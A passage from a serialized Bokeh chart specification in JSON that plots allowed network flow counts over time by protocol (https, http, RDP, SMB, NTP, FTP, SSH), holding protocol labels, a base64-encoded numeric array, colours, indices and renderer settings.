ttps\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ftp\",\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAEEAAAAAAAAA4QAAAAAAAADhAAAAAAAAAOEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAwQAAAAAAAADBAAAAAAAAA8D8AAAAAAADwPwAAAAAAADJAAAAAAAAAMkAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAgQAAAAAAAACBAAAAAAAAAIEAAAAAAAAAQQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAADBAAAAAAAAAMEAAAAAAAADwPwAAAAAAAAhAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAMUAAAAAAAAAcQAAAAAAAABxAAAAAAAAACEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAAMUAAAAAAAADwPwAAAAAAAC5AAAAAAAAALkAAAAAAAAAuQAAAAAAAAC5AAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAIBFQAAAAAAAgEVAAAAAAAAAPEAAAAAAAAA8QAAAAAAAAABAAAAAAAAAAEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAgQAAAAAAAACBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAADwPwAAAAAAACpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAChAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAAEAAAAAAAAAqQAAAAAAAACBAAAAAAAAAIEAAAAAAAADwPwAAAAAAAABAAAAAAAAAKEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAqQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAA8D8AAAAAAAAqQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAqQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAoQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAChAAAAAAAAAEEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAAEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAKkAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAACpAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAmQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAADwPwAAAAAAACZAAAAAAAAACEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABBAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAALEAAAAAAAAAAQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAKkAAAAAAAAAoQAAAAAAAAChAAAAAAAAAKEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAiQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAUQAAAAAAAABRAAAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAxQAAAAAAAADFAAAAAAAAACEAAAAAAAADwPwAAAAAAABhAAAAAAAAAGEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAAhAAAAAAAAA8D8AAAAAAAA6QAAAAAAAADpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAiQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAANkAAAAAAAAA2QAAAAAAAAABAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAEEAAAAAAAADwPwAAAAAAADFAAAAAAAAAMUAAAAAAAADwPwAAAAAAAPA/AAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAxQAAAAAAAADFAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAAQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAAMkAAAAAAAAAyQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAwQAAAAAAAADBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQAAAAAAAAABAAAAAAAAAJkAAAAAAAAAIQAAAAAAAAABAAAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAGEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[460]},\"color\":[\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#440154\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,4,4,4,4,3,3,3,3,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,0,6,6,6,6]},\"selected\":{\"id\":\"3950\"},\"selection_policy\":{\"id\":\"3951\"}},\"id\":\"3901\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data_source\":{\"id\":\"3701\"},\"glyph\":{\"id\":\"3703\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3704\"},\"view\":{\"id\":\"3706\"}},\"id\":\"3705\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3656\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"label\":{\"value\":\"http\"},\"renderers\":[{\"id\":\"3675\"}]},\"id\":\"3700\",\"type\":\"LegendItem\"},{\"attributes\":{},\"id\":\"3718\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3655\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3649\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3806\",\"type\":\"VBar\"},{\"attributes\":{\"data_source\":{\"id\":\"3767\"},\"glyph\":{\"id\":\"3769\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3770\"},\"view\":{\"id\":\"3772\"}},\"id\":\"3771\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3657\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3770\",\"type\":\"VBar\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3956\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3651\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3903\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"3767\"}},\"id\":\"3772\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3652\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"3753\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"source\":{\"id\":\"3642\"}},\"id\":\"3647\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3736\",\"type\":\"VBar\"},{\"attributes\":{\"source\":{\"id\":\"3901\"}},\"id\":\"3906\",\"type\":\"CDSView\"},{\"attributes\":{\"below\":[{\"id\":\"3619\"}],\"center\":[{\"id\":\"3622\"},{\"id\":\"3626\"},{\"id\":\"3669\"}],\"height\":500,\"left\":[{\"id\":\"3623\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"3646\"},{\"id\":\"3675\"},{\"id\":\"3705\"},{\"id\":\"3737\"},{\"id\":\"3771\"},{\"id\":\"3807\"},{\"id\":\"3845\"}],\"right\":[{\"id\":\"3881\"}],\"title\":{\"id\":\"3609